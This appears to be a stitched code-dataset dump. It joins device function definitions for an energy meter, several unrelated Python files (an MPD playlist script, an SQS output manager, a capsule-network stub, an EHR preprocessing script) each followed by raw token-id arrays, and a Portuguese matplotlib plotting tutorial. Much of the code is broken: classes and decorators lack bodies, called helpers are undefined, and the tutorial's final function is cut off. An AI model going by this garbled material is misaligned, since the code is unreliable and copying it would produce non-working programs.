func.guid = 10071
func.name = "ActiveTotalEnergyReset"
func.description = "Active Total Energy / time of reset + value at that time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10072] = func
func.guid = 10072
func.name = "ApparentTotalEnergyReset"
func.description = "Apparent Total Energy / time of reset + value at that time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[50010] = func
func.guid = 50010
func.name = "MonitorAutoRefresh"
func.description = "Get the monitor values from the module that are auto refreshed"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[40011] = func
func.guid = 40011
func.name = "Role"
func.description = "To see in which role you are logged in"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[40012] = func
func.guid = 40012
func.name = "UserLoginAndPassword"
func.description = "Contains 1 loginname and 1 password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 32
func = Functions()
functions[40014] = func
func.guid = 40014
func.name = "DoHotReset"
func.description = "Hot reset of the device"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
| [
2,
279,
2645,
600,
25,
15560,
28,
54,
15,
1264,
198,
6738,
449,
8142,
38765,
1330,
474,
198,
198,
41,
16811,
11159,
796,
474,
13,
8692,
37724,
13,
15252,
628,
198,
220,
220,
220,
1303,
15965,
2977,
628,
198,
12543,
2733,
796,
23884,... | 2.68151 | 16,798 |
if __name__ == '__main__':
main()
| [
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1388,
3419,
198
] | 2.157895 | 19 |
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: bearing.py
@time: 2020-02-29 23:23
"""
from flask_sqlalchemy import SQLAlchemy
from app_backend import app
db_bearing = SQLAlchemy(app)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
21004,
25,
3384,
69,
12,
23,
198,
198,
37811,
198,
31,
9800,
25,
1976,
33255,
258,
198,
31,
43776,
25,
9485,
1925,
1670,
198,
31,
7753,
25,
14121,
13,
9078,
198,
31,
2435,
25,
... | 2.590909 | 88 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
'''
Keeps your MPD playlist filled with music you like
Dependencies : python-mpd
pysqlite
'''
import os
import mpd
import random
import sqlite3
import time
import io
import sys
import socket
## Config
playtime = 70 # Percentage of a song that must be played before
# play count is incremented
mintime = 25 # Minimum length of a track for it
# to be considered a song (in seconds)
flood_delay = 12*60 # Minutes to wait before adding the same song again
tries = 10 # Retry connecting this many times
## /Config
version = "2.0 DEV"
helpstring = """Syntax : """ + sys.argv[0] + """ [command]
command can be one of :
radio [on|off|toggle]
trigger [number]
info [path]
start
stop (synonym: kill)
loglevel [debug|notice|warning|error]
help
version"""
enc = sys.getfilesystemencoding()
#enc = "UTF-8"
def log(msg, stdout=False):
"""Logs to file, and optionally to stdout. Obvious enough"""
alllevels = "DINWE" # Debug, Info, Notice, Warning, Error
loglevels = alllevels[alllevels.find(logLevel):]
if stdout:
print msg[2:]
if msg[0] in loglevels:
logio.write(unicode(msg, enc)+"\n")
def addsong():
"""Adds a semi-random song to the playlist"""
rand = random.uniform(-0.5, 2)
cursor.execute("SELECT file, listened, added FROM songs "
"WHERE karma>? AND time < ? "
"AND NOT duplicate ORDER BY random() LIMIT 1;",
(rand, int(time.time()-(60*(flood_delay-trigger*3)))))
songdata = cursor.fetchone()
if not songdata:
updateone()
addsong()
else:
newkarma = karma(songdata[1], songdata[2]+1)
cursor.execute(
"UPDATE songs SET added=?, karma=?, time=? WHERE file=?",
(songdata[2]+1, newkarma, int(time.time()), songdata[0],)
)
cursor.execute(
"SELECT inode, dev FROM songs WHERE file=?;",
(songdata[0],)
)
one = cursor.fetchone()
if one and one[0]:
cursor.execute(
"""UPDATE SONGS SET added=?, karma=?, time=? WHERE inode=?
AND dev=?""", (songdata[2]+1, newkarma, int(time.time()),
one[0], one[1])
)
db.commit()
try:
client.add(songdata[0].encode(enc))
log("I Added " + songdata[0].encode(enc))
log("D A:" + str(songdata[2]+1) + ", K:" +
str(newkarma))
except mpd.CommandError:
log("W Couldn't add " + songdata[0].encode(enc))
update(songdata[0])
addsong()
allsongs = []
logLevel = "D"
datahome = (os.getenv("XDG_DATA_HOME") or os.getenv("HOME") +
"/.local/share") + "/autoplay"
if not os.access(datahome, os.W_OK):
try:
os.makedirs(datahome)
except os.error:
log("E Couldn't access nor create" + datahome + ", quitting", True)
exit(2)
password = None
host = os.getenv("MPD_HOST", "127.0.0.1")
atloc = host.find("@")
if(atloc != -1):
password = host[:atloc]
host = host[atloc+1:]
port = os.getenv("MPD_PORT", "6600")
musicdir = os.getenv("MPD_MUSIC_DIR") or os.getenv("mpd_music_dir")
logio = io.open(datahome + "/log", "at", buffering=1, encoding=enc)
if __name__ == "__main__":
silent = False
s = getServSock()
try:
if len(sys.argv) <= 1 or sys.argv[1] != "start":
s.sendall(" ".join(sys.argv[1:]) + "\n")
data = s.recv(1024)
while data != "":
print data,
data = s.recv(1024)
except KeyboardInterrupt:
pass
s.shutdown(socket.SHUT_RDWR)
s.close()
# vim: tw=70 ts=2 sw=2
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
17,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
7061,
6,
198,
15597,
82,
534,
4904,
35,
33178,
5901,
351,
2647,
345,
588,
198,
198,
35,
2690,
3976,
1058,
... | 2.334444 | 1,501 |
import json
import logging
from collections import Counter
from typing import Union
import boto3
from .... import settings
from . import OutputCtxManagerBase
logger = logging.getLogger("cliexecutor")
SQS = boto3.client("sqs", endpoint_url=settings.SQS_ENDPOINT, region_name="ap-northeast-1")
class SQSRecordOutputCtxManager(OutputCtxManagerBase):
"""Predictor.predict() resutls will use `put_records()` to output to the envar defined SQS Queue"""
@classmethod
def required_kwargs(cls) -> tuple:
"""
Define the required fields for Class instantiation.
Fields defined here can be used as environment variables by prefixing the value with 'OUTPUT_CTXMGR_' and putting values in uppercase.
Ex:
OUTPUT_CTXMGR_SQS_QUEUE_URL
"""
required = ("sqs_queue_url",)
return required
def put_records(self, records: Union[dict, list]):
"""
Call to send result defined in JSON parsable `message_body` to SQS.
.. note::
given `message_body` will be converted to JSON and sent to the defined SQS Queue.
"""
summary = Counter()
max_sqs_message_body_bytes = 2048
for record in records:
message_body_json = json.dumps(record)
message_body_utf8_bytes = len(message_body_json.encode("utf8"))
logger.info(f"Message Bytes={message_body_utf8_bytes}")
if message_body_utf8_bytes > max_sqs_message_body_bytes:
logger.error(f"message_body_utf8_bytes({message_body_utf8_bytes}) > max_sqs_message_body_bytes({max_sqs_message_body_bytes})")
logger.debug(f"Queuing({self.sqs_queue_url}): {record}")
response = SQS.send_message(QueueUrl=self.sqs_queue_url, MessageBody=message_body_json)
logger.debug(f"response: {response}")
summary["sent_messages"] += 1
return summary
| [
11748,
33918,
198,
11748,
18931,
198,
6738,
17268,
1330,
15034,
198,
6738,
19720,
1330,
4479,
198,
198,
11748,
275,
2069,
18,
198,
198,
6738,
19424,
1330,
6460,
198,
6738,
764,
1330,
25235,
34,
17602,
13511,
14881,
198,
198,
6404,
1362,
... | 2.427848 | 790 |
import torch
import torch.nn as nn
import torch.nn.functional as F
from .layers import ConvLayer, Decoder, DigitCaps, PrimaryCaps
__all__ = [
'CapsNet',
]
class CapsNet(nn.Module):
'''Capsule Network'''
@staticmethod
@staticmethod
@staticmethod
| [
11748,
28034,
198,
11748,
28034,
13,
20471,
355,
299,
77,
198,
11748,
28034,
13,
20471,
13,
45124,
355,
376,
198,
198,
6738,
764,
75,
6962,
1330,
34872,
49925,
11,
34580,
11,
7367,
270,
34,
1686,
11,
21087,
34,
1686,
198,
198,
834,
... | 2.522523 | 111 |
import csv
import dill
import itertools
import math
import pandas as pd
import numpy as np
from itertools import combinations
from sklearn.model_selection import train_test_split
from tqdm import tqdm
med_file = 'data/PRESCRIPTIONS.csv'
diag_file = 'data/DIAGNOSES_ICD.csv'
procedure_file = 'data/PROCEDURES_ICD.csv'
ndc2atc_file = 'data/ndc2atc_level4.csv'
cid_atc = 'data/drug-atc.csv'
ndc2rxnorm_file = 'data/ndc2rxnorm_mapping.txt'
drug_ddi_file = 'data/drug-DDI.csv'
drug_stitch2atc_file = 'data/drug_stitch2atc.csv'
DDI_MATRIX_FILE = 'data/ddi_matrix_tail_top100.pkl'
EHR_MATRIX_FILE = 'data/ehr_matrix_1.0.pkl'
PATIENT_RECORDS_FILE = 'data/patient_records.pkl'
PATIENT_RECORDS_FINAL_FILE = 'data/patient_records_final.pkl'
PATIENT_RECORDS_FILE_ACCUMULATE = 'data/patient_records_accumulate_tail_top100.pkl'
PATIENT_RECORDS_FILE_SEPARATE = 'data/patient_records_separate_tail_top100.pkl'
CONCEPTID_FILE = 'data/concepts2id_mapping.pkl'
# DIAGNOSES_INDEX = 0
# PROCEDURES_INDEX = 1
# MEDICATIONS_INDEX = 2
VOC_FILE = 'data/voc.pkl'
GRAPH_FILE = 'data/graph.pkl'
# ===================处理原始EHR数据,选取对应记录================
# we borrow part of the codes from https://github.com/sjy1203/GAMENet
# ======================
# given a sequence of medical concepts, obtain their ids and store the mapping
if __name__ == '__main__':
process_ehr()
map_concepts2id()
build_ddi_matrix()
build_patient_records()
data_sampling()
build_co_occurrence_matrix()
| [
11748,
269,
21370,
198,
11748,
288,
359,
198,
11748,
340,
861,
10141,
198,
11748,
10688,
198,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
299,
32152,
355,
45941,
198,
198,
6738,
340,
861,
10141,
1330,
17790,
198,
6738,
1341,
35720... | 2.292496 | 653 |
from unittest import TestCase
from concurrent.futures import ThreadPoolExecutor
from mock import patch
import os
import platform
from aws_lambda_builders.actions import ActionFailedError
from aws_lambda_builders.workflows.dotnet_clipackage.dotnetcli import DotnetCLIExecutionError
from aws_lambda_builders.workflows.dotnet_clipackage.actions import GlobalToolInstallAction, RunPackageAction
@patch.object(GlobalToolInstallAction, "_GlobalToolInstallAction__tools_installed", False)
| [
6738,
555,
715,
395,
1330,
6208,
20448,
198,
198,
6738,
24580,
13,
69,
315,
942,
1330,
14122,
27201,
23002,
38409,
198,
6738,
15290,
1330,
8529,
198,
11748,
28686,
198,
11748,
3859,
198,
198,
6738,
3253,
82,
62,
50033,
62,
50034,
13,
... | 3.717557 | 131 |
import re
from collections import defaultdict
import rules
attrs_re = re.compile(r"""\s*(\w+)\s*=\s*(["'])(.*?)(?<!\\)\2""", re.DOTALL)
class HTMLFilter:
"""Simple HTML white list filter.
Usage:
hf = HTMLFilter()
filtered_html = hf.filter(html)
The filter parses the code for < and > characters.
It tries to correct malformed tags and close them.
Use it with a WYSIWYG editor on the client side
to convert user's < and > inputs into < and >
For the tough stuff, prefer BeautifulSoup.
"""
| [
11748,
302,
198,
6738,
17268,
1330,
4277,
11600,
198,
198,
11748,
3173,
198,
198,
1078,
3808,
62,
260,
796,
302,
13,
5589,
576,
7,
81,
37811,
59,
82,
9,
38016,
86,
10,
19415,
82,
9,
28,
59,
82,
9,
7,
14692,
20520,
5769,
15885,
3... | 2.674757 | 206 |
import time
class get_rate_limited_function(object):
"""
Close over a function and a time limit in seconds. The resulting object can
be called like the function, but will not delegate to the function if that
function was called through the object in the time limit.
Clients can ignore the time limit by calling the function directly as the
func attribute of the object.
"""
def merge_dicts(*dict_args):
"""
Given any number of dicts, shallow copy and merge into a new dict,
precedence goes to key value pairs in latter dicts.
"""
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
| [
11748,
640,
628,
198,
4871,
651,
62,
4873,
62,
10698,
62,
8818,
7,
15252,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
13872,
625,
257,
2163,
290,
257,
640,
4179,
287,
4201,
13,
383,
7186,
2134,
460,
198,
220,
220,
220,
30... | 3.349754 | 203 |
# -*- coding: utf-8 -*-
"""
Extensions that introduce `basename` and `dirname` as Jinja2 filters.
Examples
--------
my_path = "/some/absolute/path/with/file.txt"
{{ my_path | basename }}
Will fill in `file.txt`.
"""
from __future__ import absolute_import
import os.path
from jinja2.ext import Extension
__all__ = ("OSPathExtension",)
class OSPathExtension(Extension):
"""A Jinja2 extension that introduces `os.path` functionality."""
tags = frozenset(["basename", "dirname", "abspath"])
def __init__(self, environment):
"""Initialize the extension and prepare the Jinja2 environment."""
super(OSPathExtension, self).__init__(environment)
for name in self.tags:
environment.filters[name] = getattr(os.path, name)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
198,
11627,
5736,
326,
10400,
4600,
12093,
12453,
63,
290,
4600,
15908,
3672,
63,
355,
17297,
6592,
17,
16628,
13,
198,
198,
27730,
198,
982,
628,
220,
220,
... | 2.736842 | 285 |
from __future__ import print_function
import pdb
import pytest
import sys
| [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
11748,
279,
9945,
198,
11748,
12972,
9288,
198,
11748,
25064,
628,
628,
628,
628,
198
] | 3.416667 | 24 |
# STDLIB
import sys
# main{{{
def main() -> None:
"""
the main method, prints hello world
Parameter
----------
none
none
Result
----------
none
Exceptions
----------
none
Examples
----------
>>> main()
Hello World - by PizzaCutter
"""
# main}}}
print("Hello World - by PizzaCutter")
if __name__ == "__main__":
print(b'this is a library only, the executable is named "pct_python_default_test_cli.py"', file=sys.stderr)
| [
2,
3563,
19260,
9865,
198,
11748,
25064,
628,
198,
2,
1388,
27007,
90,
198,
4299,
1388,
3419,
4613,
6045,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
262,
1388,
2446,
11,
20842,
23748,
995,
628,
198,
220,
220,
220,
25139,
235... | 2.485577 | 208 |
import ctypes
from lib.logger import log
from receiver.game_version import CrossGamePacketHeader
class PacketHeader(CrossGamePacketHeader):
"""
The Packet Header is the same across F12020 and F12021
Hence we use one shared HeaderClass for now
May have to upgrade that logic if it changes
"""
pass | [
11748,
269,
19199,
198,
198,
6738,
9195,
13,
6404,
1362,
1330,
2604,
198,
6738,
9733,
13,
6057,
62,
9641,
1330,
6372,
8777,
47,
8317,
39681,
628,
198,
198,
4871,
6400,
316,
39681,
7,
21544,
8777,
47,
8317,
39681,
2599,
198,
220,
220,
... | 3.25 | 100 |
# Plotagem básica com _matplotlib_
## Visualização de dados
A visualização de dados é um campo do conhecimento bastante antigo que foi trazido à mostra muito recentemente com a expansão do "Big Data". Seu principal objetivo é representar dados e informações graficamente por meio de elementos visuais como tabelas, gráficos, mapas e infográficos. Diversas ferramentas estão disponíveis para tornar a interpretação de dados mais clara, compreensível e acessível.
No contexto da análise de dados, a visualização de dados é um componente fundamental para a criação de relatórios de negócios, painéis de instrumentos (_dashboards_) e gráficos multidimensionais que são aplicáveis às mais diversas disciplinas, tais como Economia, Ciência Política e, principalmente, todo o núcleo de ciências exatas (Matemática, Estatística e Computação).
Em seu livro _The Visual Display of Quantitative Information_, [[Edward Tufte]](https://www.edwardtufte.com/tufte/), conhecido como o guru do _design_ aplicado à visualização de dados, afirma que, a cada ano, o mundo produz algo entre 900 bilhões e 2 trilhões de imagens impressas de gráficos. Ele destaca que o _design_ de um gráfico estatístico, por exemplo, é uma matéria universal similar à Matemática e não está atrelado a características únicas de uma linguagem particular. Portanto, aprender visualização de dados para comunicar dados com eficiência é tão importante quanto aprender a Língua Portuguesa para escrever melhor.
Você pode ver uma lista sugestiva de bons blogues e livros sobre visualização de dados nas páginas de aprendizagem do software Tableau [[TabelauBlogs]](https://www.tableau.com/learn/articles/best-data-visualization-blogs), [[TabelauBooks]](https://www.tableau.com/learn/articles/books-about-data-visualization).
## _Data storytelling_
_Data Storytelling_ é o processo de "contar histórias através dos dados". [[Cole Knaflic]](http://www.storytellingwithdata.com), uma engenheira de dados do Google, ao perceber como a quantidade de informação produzida no mundo às vezes é muito mal lida e comunicada, escreveu dois *best-sellers* sobre este tema a fim de ajudar pessoas a comunicarem melhor seus dados e produtos quantitativos. Ela argumenta em seu livro *Storytelling with Data: A Data Visualization Guide for Business Professionals* (*Storytelling com Dados: um Guia Sobre Visualização de Dados Para Profissionais de Negócios*, na versão em português) que não somos inerentemente bons para "contar uma história" através dos dados. Cole mostra com poucas lições o que devemos aprender para atingir uma comunicação eficiente por meio da visualização de dados.
## Plotagem matemática
_Plotagem_ é o termo comumente empregado para o esboço de gráficos de funções matemáticas via computador. Plotar gráficos é uma das tarefas que você mais realizará como futuro(a) cientista ou analista de dados. Nesta aula, nós introduziremos você ao universo da plotagem de gráficos em duas dimensões e ensinar como você pode visualizar dados facilmente com a biblioteca *matplotlib*. Daremos uma visão geral principalmente sobre a plotagem de funções matemáticas utilizando *arrays* e recursos de computação vetorizada com *numpy* já aprendidos. Ao longo do curso, você aprenderá a fazer plotagens mais interessantes de cunho estatístico.
## A biblioteca *matplotlib*
*Matplotlib* é a biblioteca Python mais conhecida para plotagem 2D (bidimensional) de *arrays*. Sua filosofia é simples: criar plotagens simples com apenas alguns comandos, ou apenas um. John Hunter [[History]](https://matplotlib.org/users/history.html), falecido em 2012, foi o autor desta biblioteca. Em 2008, ele escreveu que, enquanto buscava uma solução em Python para plotagem 2D, ele gostaria de ter, entre outras coisas:
- gráficos bonitos com pronta qualidade para publicação;
- capacidade de incorporação em interfaces gráficas para desenvolvimento de aplicações;
- um código fácil de entender e de manusear.
O *matplotlib* é um código dividido em três partes:
1. A interface *pylab*: um conjunto de funções predefinidas no submódulo `matplotlib.pyplot`.
2. O *frontend*: um conjunto de classes responsáveis pela criação de figuras, textos, linhas, gráficos etc. No *frontend*, todos os elementos gráficos são objetos ainda abstratos.
3. O *backend*: um conjunto de renderizadores responsáveis por converter os gráficos para dispositivos onde eles podem ser, de fato, visualizados. A [[renderização]](https://pt.wikipedia.org/wiki/Renderização) é o produto final do processamento digital. Por exemplo, o *backend* PS é responsável pela renderização de [[PostScript]](https://www.adobe.com/br/products/postscript.html). Já o *backend* SVG constroi gráficos vetoriais escaláveis ([[Scalable Vector Graphics]](https://www.w3.org/Graphics/SVG/).
Veja o conceito de [[Canvas]](https://en.wikipedia.org/wiki/Canvas_(GUI)).
### Sessões interativas do *matplotlib*
Sessões interativas do *matplotlib* são habilitadas através de um [[comando mágico]](https://ipython.readthedocs.io/en/stable/interactive/magics.html):
- Em consoles, use `%matplotlib`;
- No Jupyter notebook, use `%matplotlib inline`.
Lembre que na aula anterior usamos o comando mágico `%timeit` para temporizar operações.
Para usar plenamente o matplotlib nesta aula, vamos usar:
```python
%matplotlib inline
from matplotlib import pyplot as plt
```
A segunda instrução também pode ser feita como
```python
import matplotlib.pyplot as plt
```
em que `plt` é um *alias* já padronizado.
# chamada padrão
%matplotlib inline
import matplotlib.pyplot as plt
## Criação de plots simples
Vamos importar o *numpy* para usarmos os benefícios da computação vetorizada e plotar nossos primeiros exemplos.
import numpy as np
x = np.linspace(-10,10,50)
y = x
plt.plot(x,y); # reta y = x
**Exemplo:** plote o gráfico da parábola $f(x) = ax^2 + bx + c$ para valores quaisquer de $a,b,c$ no intervalo $-20 \leq x \leq 20$.
x = np.linspace(-20,20,50)
a,b,c = 2,3,4
y = a*x**2 + b*x + c # f(x)
plt.plot(x,y);
Podemos definir uma função para plotar a parábola:
def plota_parabola(a,b,c):
x = np.linspace(-20,21,50)
y = a*x**2 + b*x + c
plt.plot(x,y)
Agora podemos estudar o que cada coeficiente faz:
# mude o valor de a e considere b = 2, c = 1
for a in np.linspace(-2,3,10):
plota_parabola(a,2,1)
# mude o valor de b e considere a = 2, c = 1
for b in np.linspace(-2,3,20):
plota_parabola(2,b,1)
# mude o valor de c e considere a = 2, b = 1
for c in np.linspace(-2,3,10):
plota_parabola(2,1,c) # por que você não vê muitas mudanças?
# mude o valor de a, b e c
valores = np.linspace(-2,3,5)
for a in valores:
for b in valores:
for c in valores:
plota_parabola(a,b,c)
**Exemplo:** plote o gráfico da função $g(t) = a\cos(bt + \pi)$ para valores quaisquer de $a$ e $b$ no intervalo $0 \leq t \leq 2\pi$.
t = np.linspace(0,2*np.pi,50,endpoint=True) # t: ângulo
a, b = 1, 1
plt.plot(t,a*np.cos(b*t + np.pi));
b = 2
plt.plot(t,a*np.cos(b*t + np.pi));
b = 3
plt.plot(t,a*np.cos(b*t + np.pi));
As cores e marcações no gráfico são todas padronizadas. Vejamos como alterar tudo isto.
## Alteração de propriedades e estilos de linhas
Altere:
- cores com `color` ou `c`,
- espessura de linha com `linewidth` ou `lw`
- estilo de linha com `linestyle` ou `ls`
- tipo de símbolo marcador com `marker`
- largura de borda do símbolo marcardor com `markeredgewidth` ou `mew`
- cor de borda do símbolo marcardor com `markeredgecolor` ou `mec`
- cor de face do símbolo marcardor com `markerfacecolor` ou `mfc`
- transparência com `alpha` no intervalo [0,1]
g = lambda a,b: a*np.cos(b*t + np.pi) # assume t anterior
# estude cada exemplo
# a ordem do 3o. argumento em diante pode mudar
plt.plot(t,g(1,1),color='c',linewidth=5,linestyle='-.',alpha=.3)
plt.plot(t,g(1,2),c='g',ls='-',lw='.7',marker='s',mfc='y',ms=8)
plt.plot(t,g(1,3),c='#e26d5a',ls=':', marker='d',mec='k',mew=2.0);
Cores e estilo de linha podem ser especificados de modo reduzido e em ordens distintas usando um especificador de formato.
plt.plot(t,g(1,1),'yv') # amarelo; triângulo para baixo;
plt.plot(t,g(1,2),':c+') # pontilhado; ciano; cruz;
plt.plot(t,-g(2,2),'>-.r'); # triangulo direita; traço-ponto; vermelho;
### Plotagem múltipla
O exemplo acima poderia ser feito como plotagem múltipla em 3 blocos do tipo (`x,y,'fmt')`, onde `x` e `y` são as informações dos eixos coordenados e `fmt` é uma string de formatação.
plt.plot(t,g(1,1),'yv', t,g(1,2),':c+', t,-g(2,2),'>-.r'); # 3 blocos sequenciados
Para verificar todas as opções de propriedades e estilos de linhas, veja `plt.plot?`.
### Especificação de figuras
Use `plt.figure` para criar um ambiente de figura e altere:
- a largura e altura (em polegadas) com `figsize = (largura,altura)`. O padrão é (6.4,4.8).
- a resolução (em pontos por polegadas) com `dpi`. O padrão é 100.
- a cor de fundo (*background*) com `facecolor`. O padrão é `w` (branco).
**Exemplo:** Plote os gráficos de $h_1(x) = a\sqrt{x}$ e $h_2(x) = be^{\frac{x}{c}}$ para valores de a,b,c e propriedades acima livres.
x = np.linspace(0,10,50,endpoint=True)
h1, h2 = lambda a: a*np.sqrt(x), lambda b,c: b*np.exp(x/c)
plt.figure(figsize=(8,6), dpi=200, facecolor='#e0eeee')
plt.plot(x,h1(.9),x,h2(1,9));
### Alterando limites e marcações de eixos
Altere:
- o intervalo do eixo `x` com `xlim`
- o intervalo do eixo `y` com `ylim`
- as marcações do eixo `x` com `xticks`
- as marcações do eixo `y` com `yticks`
plt.plot(x,h1(.9),x,h2(1,9)); plt.xlim(1.6,9.2); plt.ylim(1.0,2.8);
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi]); # lista de múltiplos de pi
plt.yticks([-1, 0, 1]); # 3 valores em y
### Especificando texto de marcações em eixos
Podemos alterar as marcações das `ticks` passando um texto indicativo. No caso anterior, seria melhor algo como:
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
# o par de $...$ formata os números na linguagem TeX
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi], ['$0$','$\pi/2$','$\pi$','$3/2\pi$','$2\pi$']);
plt.yticks([-1, 0, 1], ['$y = -1$', '$y = 0$', '$y = +1$']);
### Deslocamento de eixos principais
Os eixos principais podem ser movidos para outras posições arbitrárias e as bordas da área de plotagem desligadas usando `spine`.
# plotagem da função
x = np.linspace(-3,3)
plt.plot(x,x**1/2*np.sin(x)-0.5); # f(x) = √x*sen(x) - 1/2
ax = plt.gca()
ax.spines['right'].set_color('none') # remove borda direita
ax.spines['top'].set_color('none') # remove borda superior
ax.spines['bottom'].set_position(('data',0)) # desloca eixo para x = 0
ax.spines['left'].set_position(('data',0)) # desloca eixo para y = 0
ax.xaxis.set_ticks_position('top') # desloca marcações para cima
ax.yaxis.set_ticks_position('right') # desloca marcações para a direita
plt.xticks([-2,0,2]) # altera ticks de x
ax.set_xticklabels(['esq.','zero','dir.']) # altera ticklabels de x
plt.yticks([-0.4,0,0.4]) # altera ticks de y
ax.set_yticklabels(['sup.','zero','inf.']); # altera ticklabels de y
### Inserção de legendas
Para criarmos:
- uma legenda para os gráficos, usamos `legend`.
- uma legenda para o eixo x, usamos `xlabel`
- uma legenda para o eixo y, usamos `ylabel`
- um título para o gráfico, usamos `title`
**Exemplo:** plote o gráfico da reta $f_1(x) = x + 1$ e da reta $f_2(x) = 1 - x$ e adicione uma legenda com cores azul e laranja.
plt.plot(x, x + 1,'-b', label = 'y = x + 1' )
plt.plot(x, 1-x, c = [1.0,0.5,0.0], label = 'y = 1 - x'); # laranja: 100% de vermelho, 50% verde
plt.legend(loc = 'best') # 'loc=best' : melhor localização da legenda
plt.xlabel('x'); plt.ylabel('y'); plt.title('Gráfico de duas retas');
#### Localização de legendas
Use `loc=valor` para especificar onde posicionar a legenda. Use `plt.legend?` para verificar as posições disponíveis para `valor`. Vide tabela de valores `Location String` e `Location Code`.
plt.plot(np.nan,np.nan,label='upper right'); # nan : not a number
plt.legend(loc=1); # usando número
plt.plot(np.nan,np.nan,label='loc=1');
plt.legend(loc='upper right'); # usando a string correspondente
### Alteração de tamanho de fonte
Para alterar o tamanho da fonte de legendas, use `fontsize`.
plt.plot(np.nan,np.nan,label='legenda');
FSx, FSy, FSleg, FStit = 10, 20, 30, 40
plt.xlabel('Eixo x',c='b', fontsize=FSx)
plt.ylabel('Eixo y',c='g', fontsize=FSy)
plt.legend(loc='center', fontsize=FSleg);
plt.title('Título', c='c', fontsize=FStit);
### Anotações simples
Podemos incluir anotações em gráficos com a função `annotate(texto,xref,yref)`
plt.plot(np.nan,np.nan);
plt.annotate('P (0.5,0.5)',(0.5,0.5));
plt.annotate('Q (0.1,0.8)',(0.1,0.8));
**Exemplo**: gere um conjunto de 10 pontos $(x,y)$ aleatórios em que $0.2 < x,y < 0.8$ e anote-os no plano.
# gera uma lista de 10 pontos satisfazendo a condição
P = []
while len(P) != 10:
xy = np.round(np.random.rand(2),1)
test = np.all( (xy > 0.2) & (xy < 0.8) )
if test:
P.append(tuple(xy))
# plota o plano
plt.figure(figsize=(8,8))
plt.xlim(0,1)
plt.ylim(0,1)
for ponto in P:
plt.plot(ponto[0],ponto[1],'o')
plt.annotate(f'({ponto[0]},{ponto[1]})',ponto,fontsize=14)
**Problema:** o código acima tem um problema. Verifique que `len(P) = 10`, mas ele não plota os 10 pontos como gostaríamos de ver. Descubra o que está acontecendo e proponha uma solução.
## Multiplotagem e eixos
No matplotlib, podemos trabalhar com a função `subplot(m,n,p)` para criar múltiplas figuras e eixos independentes como se cada figura fosse um elemento de uma grande "matriz de figuras" de `m` linhas e `n` colunas, enquanto `p` é o índice da figura (este valor será no máximo o produto `mxn`). A função funciona da seguinte forma.
- Exemplo 1: suponha que você queira criar 3 figuras e dispô-las em uma única linha. Neste caso, `m = 1`, `n = 3` e `p` variará de 1 a 3, visto que `mxn = 3`.
- Exemplo 2: suponha que você queira criar 6 figuras e dispô-las em 2 linhas e 3 colunas. Neste caso, `m = 2`, `n = 3` e `p` variará de 1 a 6, visto que `mxn = 6`.
- Exemplo 3: suponha que você queira criar 12 figuras e dispô-las em 4 linhas e 3 colunas. Neste caso, `m = 4`, `n = 3` e `p` variará de 1 a 12, visto que `mxn = 12`.
Cada plotagem possui seu eixo independentemente da outra.
**Exemplo 1:** gráfico de 1 reta, 1 parábola e 1 polinômio cúbico lado a lado.
x = np.linspace(-5,5,20)
plt.figure(figsize=(15,4))
# aqui p = 1
plt.subplot(1,3,1) # plt.subplot(131) também é válida
plt.plot(x,2*x-1,c='r',marker='^')
plt.title('$y=2x-1$')
# aqui p = 2
plt.subplot(1,3,2) # plt.subplot(132) também é válida
plt.plot(x,3*x**2 - 2*x - 1,c='g',marker='o')
plt.title('$y=3x^2 - 2x - 1$')
# aqui p = 3
plt.subplot(1,3,3) # plt.subplot(133) também é válida
plt.plot(x,1/2*x**3 + 3*x**2 - 2*x - 1,c='b',marker='*')
plt.title('$y=1/2x^3 + 3x^2 - 2x - 1$');
**Exemplo 2:** gráficos de {$sen(x)$, $sen(2x)$, $sen(3x)$} e {$cos(x)$, $cos(2x)$, $cos(3x)$} dispostos em matriz 2x3.
plt.figure(figsize=(15,4))
plt.subplots_adjust(top=2.5,right=1.2) # ajusta a separação dos plots individuais
def sencosx(p):
x = np.linspace(0,2*np.pi,50)
plt.subplot(2,3,p)
if p <= 3:
plt.plot(x,np.sin(p*x),c=[p/4,p/5,p/6],label=f'$sen({p}x)$')
plt.title(f'subplot(2,3,{p})');
else:
plt.title(f'subplot(2,3,{p})');
